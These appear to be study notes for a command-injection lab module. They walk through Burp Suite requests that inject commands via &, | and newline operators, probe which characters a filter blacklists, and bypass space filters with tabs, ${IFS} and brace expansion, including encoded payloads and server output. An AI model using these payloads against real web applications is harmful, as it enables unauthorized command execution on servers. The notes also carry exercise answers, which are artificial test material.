COMMAND INJECTIONS

OTHER INJECTION OPERATORS

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1\n whoami
 * customize the HTTP request 
    - add the payload \n whoami to the expected input (127.0.0.1)
    - highlight the entire payload (127.0.0.1\n whoami)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding payloads ensures it gets sent as intended
    - send
    
 Response
  <pre>
  </pre>
  
 Request
  ...
  ip=127.0.0.1& whoami
  
 Response
  <pre>
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
    
    www-data
  </pre>
  
 Request
  ...
  ip=127.0.0.1| whoami
  
 Response
  <pre>
    www-data
  </pre>

IDENTIFYING FILTERS

Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?
#identifying blacklisted characters - methodology
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1; whoami
 * customize the HTTP request 
    - add the payload ; whoami to the expected input (127.0.0.1)
    - highlight the entire payload (127.0.0.1; whoami)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding payloads ensures it gets sent as intended
    - send
    
 Response
  ...
  invalid input

#01.start one character at a time
 Request
  ...
  ip=127.0.0.1;
 
 Response
  ...
  invalid input
  
#01.start one character at a time
 Request
  ...
  ip=127.0.0.1|
 
 Response
  ...
  invalid input
  
#02.see if all of the injection operators are blacklisted
 Request
  ...
  ip=127.0.0.1\n
 
 Response
  ...
  invalid input
  
 Request
  ...
  ip=127.0.0.1&
  
 Response
  ...
  <pre>
    PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
    64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.019 ms
  </pre>
  
 * \n is the accepted answer; however, the correct answer is actually &

BYPASSING SPACE FILTERS

Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
#using tabs
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1\n
 * customize the HTTP request 
    - add the payload \n to the expected input (127.0.0.1)
    - highlight the entire payload (127.0.0.1\n)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding payloads ensures it gets sent as intended
       - 127.0.0.1%0a%09ls%09-la
    - send
    
 Response
  ...
 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

 -rw-r--r-- 1 www-data www-data 1613 Jul 16  2021 index.php
 -rw-r--r-- 1 www-data www-data 1256 Jul 12  2021 style.css
 
#using ${IFS}
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1\n
 * customize the HTTP request 
    - add the payload \n to the expected input (127.0.0.1)
    - highlight the entire payload (127.0.0.1\n)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding payloads ensures it gets sent as intended
       - 127.0.0.1%0a${IFS}ls${IFS}-la
    - send
    
 Response
  ...
  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
  
  -rw-r--r-- 1 www-data www-data 1613 Jul 16  2021 index.php
  -rw-r--r-- 1 www-data www-data 1256 Jul 12  2021 style.css
  
#using brace expansion
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 * submit the expected user input

BURP > Proxy > Intercept > Raw > right-click > send to repeater
 Request
  ...
  ip=127.0.0.1\n
 * customize the HTTP request 
    - add the payload \n to the expected input (127.0.0.1)
    - highlight the entire payload (127.0.0.1\n)
    - right-click > convert selection > URL > URL-encode key characters (CTRL+U)
       - URL-encoding payloads ensures it gets sent as intended
       - 127.0.0.1%0a{ls,-la}
    - send
    
 Response
  ...
  PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

  -rw-r--r-- 1 www-data www-data 1613 Jul 16  2021 index.php
  -rw-r--r-- 1 www-data www-data 1256 Jul 12  2021 style.css

BYPASSING OTHER BLACKLISTED CHARACTERS

Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

BYPASING BLACKLISTED COMMANDS

Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found.

ADVANCED CMD OBFUSCATION

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1
PreviousINTRO TO WEBAPPSNextFILE UPLOAD ATTACKS

Last updated